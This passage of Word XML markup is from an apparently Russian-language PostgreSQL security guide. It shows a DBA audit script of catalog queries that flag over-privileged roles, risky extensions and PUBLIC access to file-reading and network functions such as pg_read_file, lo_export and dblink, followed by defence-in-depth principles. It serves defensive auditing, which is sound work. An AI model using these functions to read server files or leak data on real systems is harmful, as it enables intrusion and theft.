    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`DEBUG=True` в production (Django)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — error-based injection (3.2) даёт прямой leak через technical_500_response. См. 3.2.5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DBA quick-audit script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Объединённый SQL-script для periodic audit (per-month или per-quarter):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- 1. Application-роли с опасными flag-ами</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT rolname, rolsuper, rolbypassrls, rolcreaterole, rolreplication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_roles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE rolname NOT LIKE 'pg_%' AND rolname NOT IN ('postgres')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND (rolsuper OR rolbypassrls OR rolcreaterole OR rolreplication);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-- 2. Установленные опасные расширения</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT extname, extversion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_extension</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE extname IN ('dblink', 'postgres_fdw', 'file_fdw',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                   'plperlu', 'plpython3u', 'adminpack', 'xml2');</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-- 3. CREATE на public schema у не-DBA ролей</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT nspname, nspacl FROM pg_namespace</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE nspname = 'public' AND nspacl::text LIKE '%C/%';</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-- 4. EXECUTE на dangerous functions для PUBLIC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT proname, proacl FROM pg_proc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE proname IN ('dblink_connect', 'dblink', 'pg_read_file',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                  'pg_read_binary_file', 'lo_import', 'lo_export')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND (proacl IS NULL OR proacl::text LIKE '%=X/%');</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-- 5. Tables с RLS, но БЕЗ FORCE RLS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT n.nspname, c.relname</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_class c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JOIN pg_namespace n ON n.oid = c.relnamespace</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE c.relrowsecurity = true AND c.relforcerowsecurity = false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND n.nspname NOT IN ('pg_catalog', 'information_schema');</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-- 6. SECURITY DEFINER функции от superuser-owned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT n.nspname, p.proname, r.rolname AS owner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_proc p</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JOIN pg_namespace n ON n.oid = p.pronamespace</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JOIN pg_authid r ON r.oid = p.proowner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE p.prosecdef = true AND (r.rolsuper OR r.rolbypassrls);</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-- 7. Login event triggers (PG 17+)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT evtname, evtevent, evtfoid::regprocedure, r.rolname AS creator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_event_trigger e</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JOIN pg_authid r ON r.oid = e.evtowner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE e.evtevent = 'login';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- 8. Версия PostgreSQL (для cross-reference с 4.6)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT version();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Этот script — minimal сheck baseline. Каждая категория 3.X имеет дополнительные audit-команды в своей секции (см. summary-3.X для категорий с rules.py-сниппетами).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Связь с разделом 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6.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Таблица всех паттернов — индекс для cross-reference: каждая строка ссылается на mitigation в 5.X.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6.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Глоссарий — определения терминов (CTE, SD-функция, RLS, MERGE, etc.).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6.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Источники — официальные docs и advisory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводный принцип</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Главный принцип defence-in-depth для PostgreSQL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Не пускать значения в SQL-текст</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 5.1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Не пускать пользователя выбирать identifier без whitelist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 5.2 + 5.7.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Не давать роли больше, чем нужно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 5.3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Не ставить расширения, которые не нужны</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 5.4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
